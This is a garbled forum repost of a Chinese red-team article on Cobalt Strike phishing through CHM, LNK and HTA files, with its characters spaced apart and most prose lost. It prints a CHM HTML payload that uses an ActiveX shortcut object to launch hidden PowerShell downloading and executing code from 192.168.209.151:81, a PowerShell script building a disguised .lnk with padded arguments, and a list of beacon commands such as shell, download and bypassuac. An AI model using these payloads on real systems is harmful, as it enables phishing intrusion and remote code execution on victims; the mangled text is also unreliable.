搜索

[21200] 2020-08-16_HW准备:CobaltStrike之CHM、LNK、HTA钓鱼

文档创建者:s7ckTeam
浏览次数:23
最后更新:2025-01-18
2020-08-16_HW准备:CobaltStrike之CHM、LNK、HTA钓鱼 H W C o b a l t   S t r i k e C H M L N K H T A L e m o n S e c   2 0 2 0 - 0 8 - 1 6 C o b a l t   S t r i k e C H M L N K H T A 0 d a y   C H M C H M C H M C o m p i l e d   H e l p   M a n u a l H T M L C H M c m d   C H M     E a s y C H M   C H M i n d e x . h t m l i n d e x . h t m l i n d e x . h t m l E a s y C H M C H M < ! D O C T Y P E   h t m l > < h t m l > < h e a d > < t i t l e > M o u s e j a c k   r e p l a y < / t i t l e > < h e a d > < / h e a d > < b o d y > c o m m a n d   e x e c   < O B J E C T   i d = x   c l a s s i d = " c l s i d : a d b 8 8 0 a 6 - d 8 f f - 1 1 c f - 9 3 7 7 - 0 0 a a 0 0 3 b 7 a 1 1 "   w i d t h = 1   h e i g h t = 1 > < P A R A M   n a m e = " C o m m a n d "   v a l u e = " S h o r t C u t " >   < P A R A M   n a m e = " B u t t o n "   v a l u e = " B i t m a p : : s h o r t c u t " >   < P A R A M   n a m e = " I t e m 1 "   v a l u e = ' , c a l c . e x e ' >   < P A R A M   n a m e = " I t e m 2 "   v a l u e = " 2 7 3 , 1 , 1 " > < / O B J E C T > < S C R I P T > x . C l i c k ( ) ; < / S C R I P T > < / b o d y > < / h t m l >
C H M C o b a l t   S t r i k e a t t a c k s > w e b   D r i v e   b y > s c r i p t e d   w e b   D e l i v e r y t y p e p o w e r s h e l l l a u n c h i n d e x . h t m l c a l c . e x e < ! D O C T Y P E   h t m l > < h t m l > < h e a d > < t i t l e > M o u s e j a c k   r e p l a y < / t i t l e > < h e a d > < / h e a d > < b o d y > c o m m a n d   e x e c   < O B J E C T   i d = x   c l a s s i d = " c l s i d : a d b 8 8 0 a 6 - d 8 f f - 1 1 c f - 9 3 7 7 - 0 0 a a 0 0 3 b 7 a 1 1 "   w i d t h = 1   h e i g h t = 1 > < P A R A M   n a m e = " C o m m a n d "   v a l u e = " S h o r t C u t " >   < P A R A M   n a m e = " B u t t o n "   v a l u e = " B i t m a p : : s h o r t c u t " >   < P A R A M   n a m e = " I t e m 1 "   v a l u e = " , p o w e r s h e l l . e x e ,   - n o p   - w   h i d d e n   - c   I E X   ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 2 0 9 . 1 5 1 : 8 1 / a a ' ) ) " >   < P A R A M   n a m e = " I t e m 2 "   v a l u e = " 2 7 3 , 1 , 1 " >
C H M s h e l l L N K l n k 便 使 l n k s h e l l   p o w e r s h e l l t x t . p s 1 p o w e r s h e l l C o b a l t   S t r i k e a t t a c k s > w e b   D r i v e   b y > s c r i p t e d   w e b   D e l i v e r y t p y e p o w e r s h e l l l a u n c h p o w e r s h e l l t x t c a l c . e x e p o w e r s h e l l . p s 1 p o w e r s h e l l t e s t . l n k p o w e r s h e l l t e s t . t x t % S y s t e m R o o t % S y s t e m 3 2 S h e l l 3 2 . d l l t e s t . l n k s h e l l H T A   H T A H T M L   A p p l i c a t i o n H T M L H T A H T A H T M L J S C S S h t m l   C o b a l t   S t r i k e a t t a c k s > p a c k a g e s > H T M L   a p p l i c a t i o n   p o w e r s h e l l g e n e r a t e . h t a s h e l l   < P A R A M   n a m e = " I t e m 2 "   v a l u e = " 2 7 3 , 1 , 1 " > < / O B J E C T > < S C R I P T > x . C l i c k ( ) ; < / S C R I P T > < / b o d y > < / h t m l > c m d   / c   c a l c . e x e $ f i l e   =   G e t - C o n t e n t   " t e s t . t x t " $ W s h S h e l l   =   N e w - O b j e c t   - c o m O b j e c t   W S c r i p t . S h e l l $ S h o r t c u t   =   $ W s h S h e l l . C r e a t e S h o r t c u t ( " t e s t . l n k " ) $ S h o r t c u t . T a r g e t P a t h   =   " % S y s t e m R o o t % s y s t e m 3 2 c m d . e x e " $ S h o r t c u t . I c o n L o c a t i o n   =   " % S y s t e m R o o t % S y s t e m 3 2 S h e l l 3 2 . d l l , 2 1 " $ S h o r t c u t . A r g u m e n t s   =   '                                                                                                                                                                                                                                                                                                                                                                                                                                                                         ' $ S h o r t c u t . S a v e ( )
b e a c o n s h e l l 使 c s   h e l p   b e a c o n   s h e l l , , , e g :   h e l p   c h e c k i n n o t e   ,   e g :   n o t e   b e a c o n - s h e l l c d   , w i n , ' / '   e g :   c d   c : m k d i r   ,   e g :   m k d i r   d : b e a c o n r m   ,   e g :   r m   d : b e a c o n u p l o a d   d o w n l o a d   , e g :   d o w n l o a d   C : U s e r s w i n 7 c n D e s k t o p p u t t y . e x e c a n c e l   , , , , , s h e l l   c m d ,   e g :   s h e l l   w h o a m i g e t u i d   b e a c o n   , b y p a s s u a c p w d   l s   d r i v e s   [ w i n ] p s   k i l l   ,   e g :   k i l l   4 6 5 3 s l e e p   1 0   , 6 0 , 1 0 , , , 8 0 j o b s   , , i d , j o b k i l l   , ,   e g :   j o b k i l l   1 3 4 5 c l e a r   b e a c o n c h e c k i n   e x i t   b e a c o n   c t r l   +   k   a p i , , , C o b a l t   S t r i k e c o t a l t   s t r i k e c o t a l t   s t r i k e a t t a c k s > W e b   D r i v e - b y > C l o n e   s i t e C l o n e   U R L U R L 8 0 U R L h t t p 8 1 L o c a l   U R L L o c a l   H o s t I P L o c a l   P o r t A t t a c k f l a s h   ' s   B l o g     h t t p s : / / b l o g . c s d n . n e t / q q _ 1 7 2 0 4 4 4 1 / a r t i c l e / d e t a i l s / 9 0 4 3 6 4 8 1                                
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理